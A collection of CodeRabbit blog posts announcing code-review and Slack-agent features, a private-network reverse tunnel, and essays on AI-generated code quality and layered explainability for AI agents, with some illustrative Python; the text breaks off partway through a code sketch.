[Suggested reviewers instructions](https://docs.coderabbit.ai/pr-reviews/walkthroughs#suggested-reviewers) let you spell this out directly in the CodeRabbit YAML file. Map reviewers, individual users or teams, to the conditions where they should be assigned: ![Suggested reviewer instructions describing mapping users to PR scenarios and GitHub team support.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_33796046a9.png) ![Code snippet showing review instructions for different developer groups based on pull request changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/carbon_2_5a7479b283.png) When the list is empty, CodeRabbit falls back to its existing prior-PR-based suggestions, so you can be as exhaustive or as selective as makes sense for your team. A couple of small things worth flagging: * Team handles are supported on GitHub. On GitLab, group handles are ignored; only individual user handles get resolved and assigned. * Pair this with `auto_assign_reviewers: true` if you want CodeRabbit to actually request reviews from the suggested folks, not just list them in the walkthrough. ## Try them out If you've been mentally reconstructing the order of changes in every PR you open, Layer Based Walkthroughs should take a chunk of that off your plate. If you've been writing the same Slack messages over and over, "Hey, can someone from the platform team take a look at this?", `suggested_reviewers_instructions` will handle that part for you. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

Introducing CodeRabbit Review: The first AI-native code review interface

Priyanka Kukreja — Wed, 13 May 2026 00:00:00 GMT

## **Code review has been broken for 18 years. We built the fix.** If you have been reviewing code for more than a few years, you know a quiet truth that nobody has bothered to fix. Code Review has essentially been the same since GitHub was launched in 2008. Files, alphabetical order, scroll to the bottom. Rinse and repeat 1,000 times a year. Meanwhile, the author who wrote the pull request understands it as a story, as a new data shape, the logic that consumes it, the call sites, and the tests. That story exists in their head but nowhere in the review interface. The reviewer has to reconstruct it from scratch, file by alphabetical file, before they can even begin to evaluate correctness. That cognitive overhead is why big PRs sit for days. It is why senior engineers often rubber-stamp anything over 500 lines. It is why architectural feedback is rare and nit-picks are abundant. The tool has been shaping the behavior, and not in a good direction. **Today, CodeRabbit is shipping CodeRabbit Review, a fundamentally different way of doing code review.** ## **What CodeRabbit Review does** %[https://youtu.be/yS0EwgA2zjw] CodeRabbit Review takes any pull request and reorganizes it from a flat file list into a guided walkthrough. Instead of presenting files alphabetically, it groups related work into a small number of independent change cohorts. Each cohort is broken into ordered layers that reflect the natural reading order of the change. It is the way a thoughtful senior engineer would choose to walk someone through it. And every layer anchors to specific line ranges in the actual diff, and carries its own AI-generated summary. When the structure of a layer warrants it, such as a new API contract, a state transition, or a cross-service call sequence, CodeRabbit Review generates a diagram alongside the diff. 
CodeRabbit Review renders the visual that best captures what the code is actually doing, whether that is a sequence diagram, a state machine, or an entity-relationship diagram. Not every layer gets one, just the ones for which a visual aid would make things easier to understand. ![Dark-themed code editor displaying a Git pull request with a side-by-side code diff.](https://victorious-bubble-f69a016683.media.strapiapp.com/change_stack_3panel_98ae54e205.png) The three-panel layout puts cohort and layer navigation on the left, the diff in the center, and per-range context on the right. Keyboard navigation ('J' to advance, 'K' to go back, 'Z' for focus mode) keeps your hands off the mouse. Reviewers mark files as viewed, drop inline comments against specific ranges, accumulate a draft review, and submit a real GitHub review, all without switching tabs. Critically, reviews post back to GitHub natively. It is an upgrade to the review interface that still lands comments and approvals exactly where your team expects them, without disrupting your existing workflow. ## **Why you should care** If you are a senior developer or a tech lead whose team is shipping multiple complex PRs in any given week, then you know that the *de facto* bottleneck on the team’s merge velocity is providing fast review without sacrificing quality. CodeRabbit Review directly addresses that constraint by breaking down the code change into easy-to-review chunks, arranged in a logical manner. CodeRabbit Review also helps with cross-team reviews, those where you get pulled in because you owned a touched file or a security-sensitive path. Prior to CodeRabbit Review, on a PR like this, you’d typically spend your first 20 minutes reverse engineering what the PR is even about before you could consider next steps. CodeRabbit Review, however, makes that orientation immediate. 
For example, a CodeRabbit Review sequence diagram showing the new call path, or a state machine illustrating the updated lifecycle, reduces that 20 minutes of reverse engineering to 30 seconds. ## **Why we think this approach is better** The current generation of AI code review tools addresses the review bottleneck by layering a smarter comment bot on top of the existing GitHub interface. But that approach backfires. More comments on an already noisy PR thread increase the cognitive load on the reviewer, who now has to parse code changes, human feedback, and AI-generated commentary all at once. The problem is worse for large, unstructured diffs, and it has compounded sharply as AI-generated code volume has surged over the past year. CodeRabbit Review, however, takes a completely different angle on how the review process works. It reduces the reviewer's cognitive load by providing a walkthrough of how the PR author would have crafted the diff, and augments that walkthrough with visuals. ## **Built for how reviews actually work** ![Code review interface showing a highlighted comment extending IIRRReviewState with viewerSubmittedReview.](https://victorious-bubble-f69a016683.media.strapiapp.com/change_stack_Summary_e9fa27faa3.png) * **Reviewable layers:** CodeRabbit Review breaks a PR into functional layers, so reviewers can move through the change by intent instead of the raw file order. * **Diagrams (when they help):** Layers can include Mermaid diagrams for real flows, state changes, data relationships, or schema changes. Simple layers stay text-only. * **Layer-scoped diffs:** Each layer shows the code ranges that belong to it, with surrounding context, so reviewers stay focused on the part of the PR being explained. * **Active summary sync:** As reviewers scroll through a layer, the right rail of the user interface highlights the summary that matches the code currently in view. 
* **Snapshot history:** CodeRabbit Review retains snapshots for a PR, and reviewers can switch between them from a snapshot selector. * **Out-of-date warnings:** If the PR has moved beyond the snapshot being viewed, CodeRabbit Review shows that the view is stale and identifies the commit it was generated from. * **GitHub-native reviewing:** Comments and final review actions (approvals, change requests) sync with the GitHub surface. * **Public read-only sharing:** Public PR walkthroughs can be opened without signing in. Commenting still requires GitHub authentication. * **Reviewer-owned sign-in:** The GitHub sign-in flow preserves the exact CodeRabbit Review URL, including the selected layer or snapshot, and posts review activity as the reviewer. * **Opt-in workflow:** CodeRabbit Review opens from a CodeRabbit link and leaves the normal GitHub PR workflow intact for anyone who does not use it. ## **What comes next** CodeRabbit Review is the beginning of a more guided review experience. Code review should show more than what changed. It should help teams understand why it changed, where to focus, and how each decision fits into the larger system. We are building toward reviews that feel less like parsing diffs and more like following the story of the software as it evolves. *The diff has not changed in 18 years. We think it is time.* **CodeRabbit Review is available for free for a limited time to all users. Try it on the next large PR that lands in your queue. The “Review Change Stack” button is in CodeRabbit's PR summary comment.**

Now the agent moves first

Konrad Sopala — Wed, 13 May 2026 00:00:00 GMT

It's 3:47am and Datadog alerts you of an issue with your checkout service. The \#prod-alerts channel lights up and the engineer on call scrolls it, opens the runbook, pulls the dashboard, checks the last few deploys and starts typing the same kind of "here's what's happening" post they wrote last Tuesday. And the Tuesday before. Most of what happens after a Slack alert is muscle memory. You read the alert, decide if it's real, gather the context and then reply in thread with the next step. So far, [Automations](https://docs.coderabbit.ai/slack-agent/automations) in CodeRabbit Agent for Slack could run on a clock \- every few minutes, hourly, daily, weekly. Perfect for "summarize last week's shipped changes every Monday." Not so perfect for the messy reality of incidents, deployments and customer pings, which don't run on a clock. Something happens and then someone reacts. That's how most incidents work. So that's how the agent should work too. ## Meet Triggers %[https://youtu.be/Mw-g9txKrrY?si=p3LoJowpGRzfq-V_] [Triggers](https://docs.coderabbit.ai/slack-agent/automations#triggers) are rules that start CodeRabbit Agent for Slack the moment a matching event lands. Instead of waiting for a scheduled run, the agent fires when something real happens \- a new alert in a channel, a Datadog event, a PagerDuty incident \- and replies right in the triggering thread with whatever investigation, action, or next step you told it to take. You create and manage them from the new Triggers tab inside the [Automations page](https://agent.coderabbit.ai/automations/triggers) in the CodeRabbit Agent web app. 
## The four parts of a trigger Every trigger is made of the same four pieces: * **Source**: Where the event comes from (a Slack channel message, or a webhook from a service like Datadog) * **Matching rules**: Which events should actually fire the trigger * **Agent instructions**: What CodeRabbit Agent for Slack should do when it runs * **Destination**: Where the agent posts the result Today, you can set up two source types. ## Slack channel messages A Slack channel message trigger watches a specific channel for new top-level messages and fires whenever one matches the rule. Use it when CodeRabbit should react to repeated operational events \- new alerts, queue-health posts, deployment notices, customer escalations \- where the same kind of message keeps showing up and a human keeps doing the same kind of follow-up. You can match on: * **All new top-level messages** in the channel * **Text filters** using case-insensitive substring matching * **A required author allowlist** for specific Slack bots or Slack apps Two guardrails worth flagging: * **Only bots and apps can fire these triggers.** Messages from human teammates never match, even if the text would otherwise qualify. The author allowlist is required, not optional. * **The agent always replies in the triggering thread.** Same-thread delivery is enforced, so the investigation lives right under the alert that prompted it, not in some unrelated channel. There's no Run now button for these. To test one, post a matching message in the channel from the allowlisted bot or app. ### Example: React to new Datadog alerts A reliability team wants CodeRabbit Agent for Slack to investigate each new Datadog alert posted in `#prod-alerts`. An engineer asks CodeRabbit to save a trigger that watches new channel messages from the Datadog bot, checks whether each alert looks real, and replies with the next step. From that point on, every matching alert in `#prod-alerts` gets a thread reply from the agent. 
The trigger stays in that channel and only runs when a matching message arrives. ## Webhook events Triggers also accept inbound webhooks for services that don't post to Slack as a bot. Supported providers include Datadog, PagerDuty, Pylon, and Custom webhook. After saving a webhook trigger, CodeRabbit provides the webhook URL, required header, and a sample payload so you have everything needed to connect your source service in minutes. You can match webhook events by: * Provider event type * JSON payload fields, or any combination of the two Events that don't match any rule are dropped automatically, so nothing fires by accident. ## Setting one up 1. Open Automations \> Triggers in the [CodeRabbit Agent for Slack web app](http://agent.coderabbit.ai/automations/triggers) 2. Pick the source \- Slack channel message or one of the webhook providers 3. Define the matching rules 4. Write the agent instructions, exactly like what you'd otherwise type after `@coderabbit` in Slack 5. Pick the channel and delivery mode ![Configuration screen for setting up a new trigger with event selection and action details.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_d2560ddf4e.png) The trigger goes live immediately. Like every other automation, it runs under the [scope](https://docs.coderabbit.ai/slack-agent/scopes) that applies to the channel where it lives, so it only ever reaches the repositories, connections, and spend limits that surface is allowed to touch. ## Who can manage triggers Workspace admins can view and manage all triggers, while other users can only see and manage their own. Message-triggered automations can't be run manually; to test one, post a matching message in the channel. The Automations page also tracks run history, linking through to [thread reviews](https://docs.coderabbit.ai/slack-agent/thread-reviews) so you can inspect exactly what the agent did, for whom, and how many agent minutes it used. 
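For readers who think in code, the matching rules described in the Slack and webhook sections can be sketched as two small predicates. This is only an illustration of the documented behavior (bots and apps only, a required author allowlist, case-insensitive substring filters, event type plus payload fields). Every class, function, and field name here is hypothetical, as are the event type strings, the "any filter matches" rule, and the dotted-path lookup; none of it is CodeRabbit's actual schema or implementation.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SlackMessage:
    text: str
    author_id: str
    is_bot: bool
    is_top_level: bool = True


@dataclass(frozen=True)
class SlackRule:
    author_allowlist: frozenset  # required: bot or app IDs allowed to fire the trigger
    text_filters: tuple = ()     # empty means "all new top-level messages"

    def matches(self, message: SlackMessage) -> bool:
        # Only top-level messages from bots or apps can fire a trigger.
        if not (message.is_top_level and message.is_bot):
            return False
        if message.author_id not in self.author_allowlist:
            return False
        if not self.text_filters:
            return True
        lowered = message.text.lower()
        # Assumption: one matching filter is enough.
        return any(f.lower() in lowered for f in self.text_filters)


def webhook_matches(event_type, payload, want_type=None, want_fields=None):
    """Match on event type, payload fields, or both; unmatched events are dropped."""
    if want_type is not None and event_type != want_type:
        return False
    for dotted_path, expected in (want_fields or {}).items():
        node = payload
        for key in dotted_path.split("."):  # assumption: dotted paths address nested JSON
            if not isinstance(node, dict) or key not in node:
                return False
            node = node[key]
        if node != expected:
            return False
    return True
```

With a rule such as `SlackRule(frozenset({"B_DATADOG"}), ("triggered",))`, a `[Triggered]` alert posted by the allowlisted bot matches, while the same text typed by a human teammate or posted as a thread reply does not.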
## Try it out Triggers are available now in the [Automations page](https://agent.coderabbit.ai/automations/triggers) of your CodeRabbit Agent for Slack workspace. New to CodeRabbit Agent for Slack? Head to [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) to get started. New customers receive $50 per user in free agent minutes. When that same alert wakes up your channel at 3 AM, save a trigger and let the agent take it from there. [**Get started with CodeRabbit Agent for Slack**](https://agent.coderabbit.ai)

Nobody is going to read the code

David Loker — Tue, 12 May 2026 00:00:00 GMT

Let me say something that's uncomfortable coming from someone in my position. AI coding tools are still way worse than humans at generating correct code. And humans were bad enough as it was. We're not even at the point where AI matches human error rates. We’re well past them in the wrong direction. That's not a reason to stop using AI coding tools. It's a reason to be honest about what comes next. Here's my prediction. Within the next 12 months, most developers are not going to be looking at the code at all. Let me explain why. ## The review problem is real, but it's not new Human code review has been breaking down for years. I used to spend 20-30% of my time reviewing code. That felt like a lot. It wasn't sustainable even then. Now AI-assisted development has accelerated the volume of code coming through review without adding any time to review it. The pressure that was already there is now acute. That part of the story has been told. What hasn't been told precisely is why the specific problems AI introduces are ones human reviewers are structurally bad at catching, and why that mismatch is what will make human review untenable, not just strained, within the next year. ## What human review can't keep up with The data makes this uncomfortably specific. Logic and correctness problems are 75% more common in AI PRs than human ones, according to CodeRabbit's [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report), which analyzed 470 open-source GitHub pull requests. Error and exception handling gaps are nearly double. These are the failure modes that cause outages, and logic errors are among the most expensive to fix and the most likely to cause downstream incidents. Catching them requires a reviewer to mentally exit the happy path and think through every edge case in code they didn't write and may not fully understand. 
![Bar chart titled 'AI produces more critical issues' showing 341 for AI and 240 for Human.](https://victorious-bubble-f69a016683.media.strapiapp.com/What_human_review_can_t_keep_up_with_7e215bb937.png) Security compounds this further. AI PRs show security issues up to 2.74x higher than human PRs. The most prominent patterns involve improper password handling and insecure object references. These aren't bugs you spot at a glance. Catching them means thinking like an attacker, asking not "does this work?" but "can this be exploited?" That's a different cognitive mode, and not one every reviewer can sustain reliably, especially across a large diff they didn't author. There's also a readability problem that makes all of this worse. AI-generated code produces more than 3x the readability issues of human code. That’s because it looks clean while quietly violating local conventions and structure. As the report puts it, AI-produced code often looks consistent but violates local patterns around naming, clarity, and structure. That's the worst kind of review problem, one where the code scans fine but catching what's actually wrong requires deep familiarity with the codebase. And if you've been using AI code generation heavily, you may genuinely not know the choices that led to the code in front of you. The reasoning is opaque. You're reviewing an output, not a thought process. You don't know where to look because you don't know where the decisions were made. This is where the conversation about AI and code quality tends to stop. I think it needs to go somewhere else entirely. ## Verification, not just review What I see happening over the next 12 months is that validation shifts from reading code to verifying intent. Did the thing I wanted to happen, happen? Does the feature behave the way the prompt described? Those are answerable questions that don't require a developer to parse every exception handler in a sprawling diff. 
The layer that actually reads the code becomes automated. AI code review, static analysis, security linting, and required test coverage do that work, and they are not stopgaps. The organizations already figuring this out are treating automated review as a structural requirement, not an optional layer. They're building validation pipelines that check outputs against intent. They're not debating whether the code looks right. They've accepted that they won't be the ones looking. Every company I talk to using AI code generation is viscerally aware of what's happening inside their organization. The excitement was real. The speed gains were real. So is the reality that sets in after a while. That reality is filled with reverting PRs, chasing bugs that are hard to attribute, and fixing things that should have been caught earlier. The amount of context a model would need to hold simultaneously to generate truly correct code makes perfect output a hard problem to solve quickly. These systems are not going to stop introducing issues anytime soon. We’re going to keep coding with AI. We’re addicted. So now comes the question of whether you have the infrastructure to catch what AI gets wrong before it reaches production. Most teams don’t have that infrastructure, and the gap between AI's speed and the ability to validate its output is widening. ![Green number +11,885, red number -26, and a progress bar on a dark background.](https://victorious-bubble-f69a016683.media.strapiapp.com/10k_line_PR_3ecf3e10cd.png) You can't review a 10,000-line PR the way you'd review a hundred-line one. Nobody can. The sooner engineering organizations accept that and build accordingly, the better positioned they'll be when, and not if, the human review model breaks down entirely. The code will keep coming. The question is what you put between it and production.

Introducing CodeRabbit Reverse Tunnel: AI code review for private-network enterprises

Henry Lau — Fri, 08 May 2026 00:00:00 GMT

[CodeRabbit Reverse Tunnel](https://docs.coderabbit.ai/self-hosted/coderabbit-reverse-tunnel) is a new private-network connectivity option, a first-party component that lets CodeRabbit review pull requests on a [GitHub Enterprise Server (GHES)](https://docs.coderabbit.ai/platforms/github-enterprise-server) instance that does not accept inbound network connections. If your team runs GHES inside a private network with no public endpoint, no inbound firewall exceptions, no vendor IP allowlisting on the GHES side, and no PrivateLink or peering path, this is for you. It's available for [Enterprise Plan](https://coderabbit.ai/enterprise) customers today. What it unlocks: * AI code review on a private Git platform, with no exposure to the public internet. * No new inbound firewall rules, no platform-side IP allowlist, and no PrivateLink or peering required. * A Connector that deploys into your existing container runtime, alongside other internal workloads. * A standard, auditable network shape: Outbound HTTPS on TCP 443\. ## Why we built Reverse Tunnel A class of enterprise customers operates GitHub Enterprise Server inside a private network with no inbound connectivity by design. These security constraints are typically codified in audit and compliance frameworks and cannot be relaxed for individual vendor onboarding. Existing solutions like VPN tunnels, public-ELB exposures, and PrivateLink peering require either an inbound route into the customer network or a cloud-provider solution. Without an alternative transport, these customers have no compliant path to deploy CodeRabbit. CodeRabbit Reverse Tunnel exists to close this gap. It enables these enterprises to adopt AI code review while preserving the security and compliance constraints they already have in place. 
## How CodeRabbit Reverse Tunnel works ![CodeRabbit Reverse Tunnel architecture diagram details secure data flow between customer and CodeRabbit systems.](https://victorious-bubble-f69a016683.media.strapiapp.com/Architecure_049d2dd8f6.png) CodeRabbit Reverse Tunnel is built around two components: a Connector that runs inside your network and a Gateway operated by CodeRabbit. Together they create a single outbound channel over which CodeRabbit can read from and write to your private GHES instance, without your network accepting any inbound connections. ### Components 1. **Reverse Tunnel Connector.** A lightweight, stateless container that runs inside your enterprise network. On startup, it dials out and establishes a long-lived WebSocket Secure (WSS) session to the Gateway on TCP 443\. All subsequent CodeRabbit traffic to GHES flows through this session. 2. **Reverse Tunnel Gateway.** A CodeRabbit-managed edge service that accepts Connector sessions and brokers CodeRabbit's runtime requests back through them. The Gateway authenticates each session using credentials issued to your tenant and routes traffic to the right Connector. ## **What happens when a developer opens a PR** ![Sequence diagram illustrating a developer workflow with customer network and Lucihaus systems.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_4f088f3c64.png) When a developer opens a PR, GHES sends a signed webhook outbound through your existing NAT to CodeRabbit. Everything that follows runs on the WSS session your Connector has already opened: the Reverse Tunnel Gateway forwards CodeRabbit's read requests over WSS, the Connector translates them into internal HTTPS calls to GHES, and responses stream back the same way. CodeRabbit generates the review and posts the comments back through the same tunnel. 
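The general reverse-tunnel pattern is easy to see in miniature. In the sketch below, a connector dials out to a gateway, and the gateway then sends requests back over that already-open connection, so the "private" side never accepts an inbound connection. This is a toy under loud assumptions: plain TCP on localhost stands in for WSS on TCP 443, newline-delimited JSON stands in for the real framing, there is no authentication or tenant routing, and every name (including the request path) is hypothetical. It is not CodeRabbit's implementation.

```python
import asyncio
import json


async def internal_git_server(path):
    """Stand-in for the private Git server, reachable only from inside the network."""
    return {"status": 200, "body": f"contents of {path}"}


async def connector(gateway_host, gateway_port):
    """Dial OUT to the gateway, then answer requests that arrive on that session."""
    reader, writer = await asyncio.open_connection(gateway_host, gateway_port)
    try:
        while line := await reader.readline():  # empty bytes means the gateway hung up
            request = json.loads(line)
            response = await internal_git_server(request["path"])
            response["id"] = request["id"]
            writer.write(json.dumps(response).encode() + b"\n")
            await writer.drain()
    finally:
        writer.close()
        await writer.wait_closed()


class Gateway:
    """Accepts one connector session and sends requests back through it."""

    def __init__(self):
        self._connected = asyncio.Event()
        self._reader = None
        self._writer = None
        self._server = None
        self._next_id = 0

    async def _on_session(self, reader, writer):
        # Keep the streams so later requests can reuse the connector's session.
        self._reader, self._writer = reader, writer
        self._connected.set()

    async def start(self):
        self._server = await asyncio.start_server(self._on_session, "127.0.0.1", 0)
        return self._server.sockets[0].getsockname()[1]

    async def request(self, path):
        await self._connected.wait()
        self._next_id += 1
        frame = {"id": self._next_id, "path": path}
        self._writer.write(json.dumps(frame).encode() + b"\n")
        await self._writer.drain()
        return json.loads(await self._reader.readline())

    async def close(self):
        self._writer.close()
        await self._writer.wait_closed()
        self._server.close()


async def demo():
    gateway = Gateway()
    port = await gateway.start()
    session = asyncio.create_task(connector("127.0.0.1", port))
    response = await gateway.request("/repos/acme/app/pulls/1")  # hypothetical path
    await gateway.close()
    await session
    return response


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

The only listening socket belongs to the gateway. The connector, which is the side that can reach the internal server, only ever makes an outbound connection, and that is the property that makes the pattern suitable for networks with no inbound route.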
## **Getting started with CodeRabbit Reverse Tunnel** CodeRabbit Reverse Tunnel is available now for Enterprise Plan customers running GitHub Enterprise Server in private networks, with support for additional Git platforms on the roadmap. Our goal is always to provide flexible deployment options for our customers, and this release is a testament to that. Customers who self-host with strict requirements can now use our state-of-the-art review engine to deliver high-quality code faster. We’re committed to making our customers successful and our team is here to answer any questions you have along the way. For detailed information, please consult the [documentation](https://docs.coderabbit.ai/self-hosted/coderabbit-reverse-tunnel) or [contact our team](https://www.coderabbit.ai/contact-us/sales).

Do you trust your AI Agent?

Priyanka Kukreja — Fri, 08 May 2026 00:00:00 GMT

## Your AI agent needs to show its homework >Explainability is what determines whether an AI Agent gets deployed to solve real-world problems, or remains a sidekick on non-critical enterprise tasks. A year ago, Agentic AI launched and blew everyone away. It transformed LLMs from a chat tool into one that can actually “do” things for you. But now that agents are near-ubiquitous, they face a tougher problem: Earning trust. An agent can be called "autonomous", but if it can't explain the what and why of its actions to my stakeholders (say, my manager, my customers, or my audit review team), then its autonomy isn't really worth much. Whether agents get used on serious work, or stay sidekicks on low-stakes tasks, comes down to just one thing: can people really understand what they're doing? ## Do you really need explainability? First, it's worth separating "explainability" and "observability", which are sometimes (incorrectly) used interchangeably. **Observability** is about "what happened". This is a simple mechanical record of actions, tool calls, inputs, outputs, branching paths. This is an engineering problem that's largely solved. You can build structured logging, and the challenge here is making those logs useful at scale. **Explainability** is about "why it happened". This is about understanding the agent's reasoning behind decisions, the alternatives it considered, how confident it was, and so on. This is the harder, partly unsolved problem. Now, if any of the following holds true, the agent has to explain itself further. ![Diagram illustrating factors for AI agent explainability: scope, cost, and sensitive contexts.](https://victorious-bubble-f69a016683.media.strapiapp.com/why_your_agent_needs_to_explain_itself_59330f32e5.jpeg) In these situations, if the agent can't explain itself, you end up with a trust deficit. 
A classic example of this is something every agentic engineering team knows well: an incident occurs and developers are trying to debug what the agent did. They pull up logs, and find that the agent was tasked with X but also did Y and Z. They try to piece together a timeline and the root cause. But the path from agent’s action to real-world outcome isn’t clear, and neither is the reasoning behind those actions. This “trust” tax compounds silently but surely. Once users stop understanding what the agent is doing, they lose confidence it will do the right thing. Over time, they hesitate before handing anything mission-critical, and end up adding manual review steps that eliminate the productivity gain. Sure, the agent offers autonomy, but it fails to build confidence. And, without confidence, autonomy stops getting used (on the things that matter, at least). This is not just a hypothetical failure mode. It shows up across every category of AI deployment: from code review agents that developers second-guess despite high accuracy, to customer-facing agents where support teams shadow every interaction, not because quality is poor, but because no one can explain what happened when a customer escalates their issue to support. This gap between what an agent logs and what a human can actually understand is what ultimately keeps agentic products from getting traction. ## The three jobs of explainability ![Diagram illustrating observing AI agents with verification, debugging, and auditability on a timeline.](https://victorious-bubble-f69a016683.media.strapiapp.com/observing_your_AI_agent_cec3fa1859.jpeg) Explainability has three primary jobs-to-be-done, each requiring a different product response: ### Verification: Did the agent do what I asked? The user wants a fast, high-confidence signal. They are not debugging or looking for a trace. They just want a checkmark. Showing them a tool call log here is the wrong answer. 
It would be like responding to “did the payment go through?” with a database query result.

### Debugging: Where did it go wrong and why?

This user already suspects a failure. They need to trace the decision path, identify the branch where things diverged, and understand the root cause. Here, what they need is depth, not just an outcome or a reassurance.

### Auditability: Can I demonstrate what happened to someone else?

The primary consumer here is not the user. It is their manager, their compliance team, their customer, or their future self six months later trying to understand a past decision. Accordingly, the artifact here must be exportable, immutable and structured for a reader with no prior context.

A product that tries to serve all three from a single interface will serve none of them well. Each use case has different requirements: verification needs compression, debugging needs depth and auditability needs structure and permanence.

## The Explainability stack

![Diagram showing The Explainability Stack with product and technical thinking stages.](https://victorious-bubble-f69a016683.media.strapiapp.com/the_explainability_stack_d22269fccd.jpeg)

I think about explainability and observability as a layered architecture, not a single feature. Each layer is the right answer for a different user in a different context.

**Layer 0 - Outcome:** Did it work? A simple binary. This is what most users want most of the time for routine tasks.

**Layer 1 - Narrative:** A plain-language summary of what the agent did and why. "Created the PR, flagged three issues, posted inline comments on lines 42, 87, and 203." Think of it as an expedition report: the agent went out, came back, and here is what it found.

**Layer 2 - Decision Trace:** Why did the agent make the choices it made? What alternatives did it consider and reject? This is where you begin to see reasoning, not just actions.
**Layer 3 - Tool and Branch Log:** What tools were called, with what parameters, what was returned, what paths were explored, what dead ends were hit. This is where engineers live when something breaks. It is still output-based, not reasoning-based, but it shows the mechanical path the agent took.

**Layer 4 - Model Reasoning:** Chain-of-thought at inference time. This is where the model starts showing its actual reasoning process. This is super valuable for evaluation, model improvement and fine-tuning pipelines, while still being relevant for end users in production environments when something has gone wrong.

**Layers 5 to 7 - The Deep Stack:** Attention patterns, neuron activations, interpretability research. This is the frontier of mechanistic understanding. It is a fascinating science, but not a product feature (yet).

The pattern is consistent: the closer someone is to the implementation, the deeper they want to go. A solutions engineer reviewing a weekly agent summary lives at Layer 1. A developer debugging an unexpected tool call lives at Layer 3. A researcher studying emergent model behavior lives at Layer 5. Explainability and observability are not one-size-fits-all: the right depth is defined by where your user actually sits.

## Applying the Explainability stack

The Explainability stack has two practical applications: (1) defining the right user experience, and (2) diagnosing where your success metrics are breaking down.

### Defining user experience

Start by listing every audience that touches your agent: for example, the end user, support, the sales engineer, and the compliance reviewer. For each, ask which layer they actually need. Most teams collapse this into a single "show logs" toggle, which over-shows to non-technical users and under-shows to engineers.
The fix is layered disclosure tied to specific surfaces:

* **Layer 0 in the headline UI:** A green check on the PR, or a "3 tickets resolved" badge
* **Layer 1 in async recaps:** A Monday digest in Slack, or a weekly email summary
* **Layer 2 behind a one-click "why?":** On any decision the user might disagree with
* **Layers 3 and 4:** Gated behind a developer console or audit export

The payoff for this separation shows up in support. When a customer says "the agent did the wrong thing," you can walk down the stack with them, starting from the outcome and going deeper only as needed. That is how trust gets built in practice.

### Diagnosing success metrics

Each layer you skip has a cost, and the cost compounds the further along in your deployment you are.

**Skipping Layer 0 or 1 hurts adoption.** Without them, no basic trust loop forms with the user, so they never delegate a second task. The agent stalls at novelty.

**Skipping Layer 2 hurts retention.** Users only continue handing off work to an agent they feel confident they could overrule. This is why Cursor's diff view and Codex's change preview matter as much to stickiness as a model upgrade, if not more.

**Skipping Layer 3 stalls enterprise deals.** How critical this layer is depends on the industry and the regulatory environment your product operates in.

**Skipping Layer 4 undermines your evals.** Without reasoning traces, your evaluation pipeline anchors on outcomes alone. That makes it nearly impossible to tell whether the agent took the right path to a result, or whether it got lucky on test data.

## Sync vs. Async: Two different products

There is a temporal dimension to explainability that most teams underspecify, and it changes the product architecture substantially.

**Synchronous explainability** enables users to watch the agent work in real time: thinking traces, live tool-call streams, visible course corrections. This modality serves a different purpose than the final output.
It builds confidence during execution. When a user can see the agent head down an unproductive path and self-correct, that visible recovery builds further trust. More importantly, it creates the opportunity for the user to intervene early, saving time and tokens.

**Asynchronous explainability** is a post-facto report. The agent executed, returned, and here is a structured account of where it went and what it decided. This format is what makes parallel agent workloads manageable at scale. If you are operating a fleet of agents across a codebase running simultaneous reviews, dependency checks, and security scans, you cannot watch each one live. The expedition report format provides that management layer.

Sync and async explainability are not the same product. They have different information hierarchies, different latency tolerances, and different “emotional contracts” with the user. Building one does not necessarily give you the other.

## The Goldilocks constraint

![Goldilocks Constraint bell curve illustrating optimal productive engagement with just right explanation value.](https://victorious-bubble-f69a016683.media.strapiapp.com/goldilocks_constraint_8022304d5c.jpeg)

There is a delicate calibration problem at the center of all of this:

Too little explainability: users cannot verify the agent’s reasoning, so they will not hand the agent anything that matters.

Too much explainability: users hit decision fatigue. Once they stop reading and start rubber-stamping everything because of the sheer volume of output, user engagement becomes performative. It is only a matter of time before adoption stalls.

The perils of the first failure mode are well documented above. But the second one works in a more insidious way by producing an appearance of oversight without the substance of it. For anyone operating in a regulated environment, that gap can become a compliance liability faster than it looks.
This is also [Goodhart’s Law](https://lawsofsoftwareengineering.com/laws/goodharts-law/) showing up in a new domain: when a measure becomes a target, it stops being a good measure. If “volume of explanation” becomes the proxy for “quality of oversight,” products will optimize the proxy and lose the thing it was meant to measure. More logs, traces, and reasoning text simply produce a reader who has stopped engaging with any of it.

The reference point I keep returning to is this: what does a skilled human collaborator tell you after working on something independently? They do not narrate every search query, or share their entire browser history. They say: 'I looked at X and Y. X was a dead end for this reason. Y is the path forward, here is why, and here is what I am not certain about.'

## The rendering question is still open

There are several modalities to render explainability: natural language narration, structured timelines, visual diff rendering, collapsible tool call trees. All are legitimate formats depending on context. The more interesting product question is not which modality to choose, but how you empower the agent to determine the appropriate one given the context and the user.

For synchronous traces, more raw structure is acceptable since the user is present and can navigate. For asynchronous reports, where the reader has no prior context, you cannot expect them to parse the raw logs. Curation becomes table stakes: relevance, readability, parsability.

I do not think this problem has a clean industry solution yet. But teams that frame it as a product design problem, rather than just an engineering logging problem, will get there faster.

## Trust is the whole game

A few years from now, we will reflect back on what made certain products more successful than others. One thing will be clear: the products with better explainability enjoyed greater user trust, and so were the ones chosen to tackle mission-critical tasks.
As the foundational models head towards commoditization, the true differentiator will be how deeply a product can build a bond with the user. Trust is the foundation of any bond, for both humans and products.

![Comic: Identical AI models, human effort dismissed, and a model discarded in a trash can.](https://victorious-bubble-f69a016683.media.strapiapp.com/models_eventually_28facda63a.png)

At CodeRabbit, this is not just theoretical. We are building explainability across the board on all of our products. The question of how to show developers what happened and why, without burying them in the output, is one we are working through in production right now. More on what that looks like soon!
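
One way to picture the layered disclosure described under "Defining user experience" is as a small data model. The sketch below is hypothetical: the `Layer` enum mirrors Layers 0 to 4 from this post, while `AgentRun`, `disclose`, and the audience names and caps in `MAX_LAYER_BY_AUDIENCE` are assumptions made for illustration, not a description of any shipped product.

```python
from dataclasses import dataclass, field
from enum import IntEnum


class Layer(IntEnum):
    OUTCOME = 0          # did it work?
    NARRATIVE = 1        # plain-language summary of what and why
    DECISION_TRACE = 2   # choices made, alternatives rejected
    TOOL_LOG = 3         # tool calls, parameters, results, dead ends
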